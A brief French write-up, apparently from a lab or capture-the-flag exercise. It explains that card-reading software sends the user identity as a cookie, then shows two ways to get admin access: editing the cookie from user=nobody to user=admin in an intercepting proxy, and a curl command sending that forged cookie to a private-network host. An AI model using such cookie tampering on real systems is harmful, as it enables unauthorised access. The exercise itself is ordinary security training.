Le logiciel effectue la lecture de l'identifiant par scan de la carte.
Puis il envoie l'information sous forme de cookie dans la méthode POST http://10.10.10.15/index.php

Méthode 1:
Interception par un proxy HTTP
- Modifier Cookie user=nobody en Cookie user=admin
- Rejouer le message

Méthode 2:
Dans le terminal
$ curl --data id=22 --cookie 'user=admin' http://10.10.10.13 | grep admin